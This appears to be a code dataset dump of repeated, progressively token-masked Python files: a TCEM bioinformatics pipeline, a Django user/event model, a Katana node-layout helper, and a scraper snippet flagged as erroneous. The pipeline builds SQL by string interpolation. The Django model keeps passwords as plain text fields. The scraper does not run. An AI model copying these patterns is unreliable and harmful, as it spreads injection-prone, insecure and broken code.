PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n\n def tool_version(self):\n return self.version()\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n <function token>\n\n @property\n def tcem_counts_path(self):\n return self.output()[f'tcem_counts'].path\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n\n def tool_version(self):\n return self.version()\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::tcem_repertoire'\n <function token>\n <function token>\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n\n def tool_version(self):\n return self.version()\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _run(self):\n motif_counts = parse_mixcr_table(self.mixcr.igh_path)\n out = pd.DataFrame.from_dict(motif_counts, orient='index')\n out.to_csv(self.tcem_counts_path)\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n\n\nclass TcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n module_description = \"\"\"\n This module identifies repertoires of TCEMs in VDJ clonal sequences.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n\n @classmethod\n def version(cls):\n return 'v0.1.0'\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n <function token>\n\n def tool_version(self):\n return self.version()\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n <function token>\n <function token>\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n\n @property\n def tcem_annotation_path(self):\n return self.output()[f'tcem_annotations'].path\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n\n def requires(self):\n return self.repetoire\n <function token>\n <function token>\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n <function token>\n <function token>\n <function token>\n\n @classmethod\n def dependencies(cls):\n return [TcemRepertoire]\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n <function token>\n <function token>\n <function token>\n <function token>\n\n @classmethod\n def _module_name(cls):\n return 'tcems::annotated_tcem_repertoire'\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n\n def _run(self):\n with sqlite3.connect(self.db.tcem_index) as conn:\n c = conn.cursor()\n rep = pd.read_csv(self.repetoire.tcem_counts_path)\n kmers = rep.iloc[:, 1].unique()\n tbl = {}\n for kmer in kmers:\n tbl[kmer] = {}\n cmd = f'SELECT taxon FROM taxa_kmers WHERE kmer = \"{kmer}\"'\n for taxon in c.execute(cmd):\n tbl[kmer][taxon] = 1\n tbl = pd.DataFrame.from_dict(tbl, orient='index')\n tbl.to_csv(self.tcem_annotation_path)\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.repetoire = TcemRepertoire.from_cap_task(self)\n self.db = TcemNrAaDb.from_cap_task(self)\n self.config = PipelineConfig(self.config_filename)\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def output(self):\n out = {'tcem_annotations': self.get_target(\n f'annotated_tcem_repertoire', 'csv')}\n return out\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n\n\nclass AnnotatedTcemRepertoire(CapTask):\n <assignment token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<class token>\n<class token>\n"
] | false |
99,811 | b6f498aa1e91eea437cec1c0b1e15d729dfa3e64 | from __future__ import unicode_literals
from django.db import models
import datetime as dt
import re
EMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\.[a-zA-Z]+$')
class UserManager(models.Manager):
def basic_validator(self, postData):
errors = {}
if len(postData['firstname']) < 3:
errors["firstname"] = "First name should be longer than 2 characters!"
print "There is an error"
if len(postData['username']) < 3:
errors["username"] = "First name should be longer than 2 characters!"
print "There is an error"
if not EMAIL_REGEX.match(postData['email']):
errors['email'] = "Email does not match the correct format"
print "There is an error"
if len(postData['password']) < 8:
errors["password"] = "Password must be 8 characters"
print "There is an error"
if (postData['confirmation'] != postData['password']):
errors["confirmation"] = "Passwords do not match"
print "There is an error"
return errors
class User(models.Model):
firstname = models.CharField(max_length = 255)
username = models.CharField(max_length = 255)
password = models.CharField(max_length = 255)
email = models.CharField(max_length = 255)
created_at = models.DateTimeField(auto_now_add = True)
updated_at = models.DateTimeField(auto_now = True)
objects = UserManager()
class Event(models.Model):
name = models.CharField(max_length = 255)
start = models.CharField(max_length = 255)
stop = models.CharField(max_length = 255)
location = models.CharField(max_length = 255)
description = models.CharField(max_length = 255)
created_at = models.DateTimeField(auto_now_add = True)
updated_at = models.DateTimeField(auto_now = True)
user = models.ForeignKey(User, related_name = "events")
class Group(models.Model):
groupname = models.CharField(max_length = 255)
created_at = models.DateTimeField(auto_now_add = True)
updated_at = models.DateTimeField(auto_now = True)
# Create your models here.
| [
"from __future__ import unicode_literals\nfrom django.db import models\nimport datetime as dt\nimport re\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]+$')\n\n\n\nclass UserManager(models.Manager):\n def basic_validator(self, postData):\n errors = {}\n if len(postData['firstname']) < 3:\n errors[\"firstname\"] = \"First name should be longer than 2 characters!\"\n print \"There is an error\"\n if len(postData['username']) < 3:\n errors[\"username\"] = \"First name should be longer than 2 characters!\"\n print \"There is an error\"\n if not EMAIL_REGEX.match(postData['email']):\n errors['email'] = \"Email does not match the correct format\"\n print \"There is an error\"\n if len(postData['password']) < 8:\n errors[\"password\"] = \"Password must be 8 characters\"\n print \"There is an error\"\n if (postData['confirmation'] != postData['password']):\n errors[\"confirmation\"] = \"Passwords do not match\"\n print \"There is an error\"\n return errors\n\n\nclass User(models.Model):\n firstname = models.CharField(max_length = 255)\n username = models.CharField(max_length = 255)\n password = models.CharField(max_length = 255)\n email = models.CharField(max_length = 255)\n created_at = models.DateTimeField(auto_now_add = True)\n updated_at = models.DateTimeField(auto_now = True)\n objects = UserManager()\n\nclass Event(models.Model):\n name = models.CharField(max_length = 255)\n start = models.CharField(max_length = 255)\n stop = models.CharField(max_length = 255)\n location = models.CharField(max_length = 255)\n description = models.CharField(max_length = 255)\n created_at = models.DateTimeField(auto_now_add = True)\n updated_at = models.DateTimeField(auto_now = True)\n user = models.ForeignKey(User, related_name = \"events\")\n\nclass Group(models.Model):\n groupname = models.CharField(max_length = 255)\n created_at = models.DateTimeField(auto_now_add = True)\n updated_at = models.DateTimeField(auto_now = True)\n\n\n\n\n\n\n# Create your models here.\n"
] | true |
99,812 | ec99b3da3033827574f8c92512ed25c9776ecaee | import os, requests, subprocess
# url = 'https://google.come/favicon.ico'
# r = requests.get(url, allow_redirects=True)
# open ('google.ico', 'wb').write(r.content)
req = requests.get()
text = req.text
img_url_list = []
text_list = text.split('img')
def locate_image(e):
e = e.find('"')
img_url = e.split('"')
img_url = img_url[1]
img_url_list.append(img_url)
for e in text_list:
if 'src' in e:
locate_image(e)
print(img_url_list)
for i in img_url_list:
req = requests.get(f'GITHUB', stream=True)
with open(i[:4])
| [
"import os, requests, subprocess\n\n \n# url = 'https://google.come/favicon.ico'\n# r = requests.get(url, allow_redirects=True)\n# open ('google.ico', 'wb').write(r.content)\n\n\nreq = requests.get()\ntext = req.text\nimg_url_list = []\n\ntext_list = text.split('img')\n\ndef locate_image(e):\n \n e = e.find('\"')\n \n img_url = e.split('\"')\n img_url = img_url[1]\n img_url_list.append(img_url)\n \nfor e in text_list:\n if 'src' in e:\n locate_image(e)\n\nprint(img_url_list)\n\nfor i in img_url_list:\n req = requests.get(f'GITHUB', stream=True)\n \n with open(i[:4])\n \n"
] | true |
99,813 | f2affb16265b73cb4113da4ee7c03fbd3a14fa14 | from Katana import (
NodegraphAPI
)
def change_node_layout(node, x_spacing=200, y_spacing=100):
"""
"""
pos_x, pos_y = NodegraphAPI.GetNodePosition(node)
# Start far enough to the left to leave room for all the node's inputs
new_pos_x = pos_x - (x_spacing * (node.getNumInputPorts() - 1)) / 2
new_pos_y = pos_y + y_spacing
for input_port in node.getInputPorts():
if input_port.getNumConnectedPorts():
input_node = input_port.getConnectedPort(0).getNode()
# Stop if we hit our own parent - this means the connection leaves
# the GroupNode we're in
if input_node != node.getParent():
NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y))
# Recursively call this function
change_node_layout(input_node, x_spacing, y_spacing)
new_pos_x += x_spacing
def add_node_reference_param(dest_node, dest_node_param_name, node):
"""
"""
# Get or create the parameter on the given node
dest_node_param = dest_node.getParameter(dest_node_param_name)
if not dest_node_param:
dest_node_param = dest_node.getParameters().createChildString(dest_node_param_name, "")
# Set the expression to point to the node name
dest_node_param.setExpression("getNode('{node_name}').getNodeName()".format(node_name=node.getName()))
def get_reference_node(node, key):
"""
"""
parameter = node.getParameter("node_" + key)
if not parameter:
return None
return NodegraphAPI.GetNode(parameter.getValue(0))
| [
"from Katana import (\n NodegraphAPI\n)\n\n\ndef change_node_layout(node, x_spacing=200, y_spacing=100):\n \"\"\"\n \"\"\"\n pos_x, pos_y = NodegraphAPI.GetNodePosition(node)\n\n # Start far enough to the left to leave room for all the node's inputs\n new_pos_x = pos_x - (x_spacing * (node.getNumInputPorts() - 1)) / 2\n new_pos_y = pos_y + y_spacing\n\n for input_port in node.getInputPorts():\n if input_port.getNumConnectedPorts():\n input_node = input_port.getConnectedPort(0).getNode()\n\n # Stop if we hit our own parent - this means the connection leaves\n # the GroupNode we're in\n if input_node != node.getParent():\n NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y))\n\n # Recursively call this function\n change_node_layout(input_node, x_spacing, y_spacing)\n\n new_pos_x += x_spacing\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n # Get or create the parameter on the given node\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(dest_node_param_name, \"\")\n\n # Set the expression to point to the node name\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".format(node_name=node.getName()))\n\n\ndef get_reference_node(node, key):\n \"\"\"\n \"\"\"\n parameter = node.getParameter(\"node_\" + key)\n\n if not parameter:\n return None\n\n return NodegraphAPI.GetNode(parameter.getValue(0))\n",
"from Katana import NodegraphAPI\n\n\ndef change_node_layout(node, x_spacing=200, y_spacing=100):\n \"\"\"\n \"\"\"\n pos_x, pos_y = NodegraphAPI.GetNodePosition(node)\n new_pos_x = pos_x - x_spacing * (node.getNumInputPorts() - 1) / 2\n new_pos_y = pos_y + y_spacing\n for input_port in node.getInputPorts():\n if input_port.getNumConnectedPorts():\n input_node = input_port.getConnectedPort(0).getNode()\n if input_node != node.getParent():\n NodegraphAPI.SetNodePosition(input_node, (new_pos_x, new_pos_y)\n )\n change_node_layout(input_node, x_spacing, y_spacing)\n new_pos_x += x_spacing\n\n\ndef add_node_reference_param(dest_node, dest_node_param_name, node):\n \"\"\"\n \"\"\"\n dest_node_param = dest_node.getParameter(dest_node_param_name)\n if not dest_node_param:\n dest_node_param = dest_node.getParameters().createChildString(\n dest_node_param_name, '')\n dest_node_param.setExpression(\"getNode('{node_name}').getNodeName()\".\n format(node_name=node.getName()))\n\n\ndef get_reference_node(node, key):\n \"\"\"\n \"\"\"\n parameter = node.getParameter('node_' + key)\n if not parameter:\n return None\n return NodegraphAPI.GetNode(parameter.getValue(0))\n",
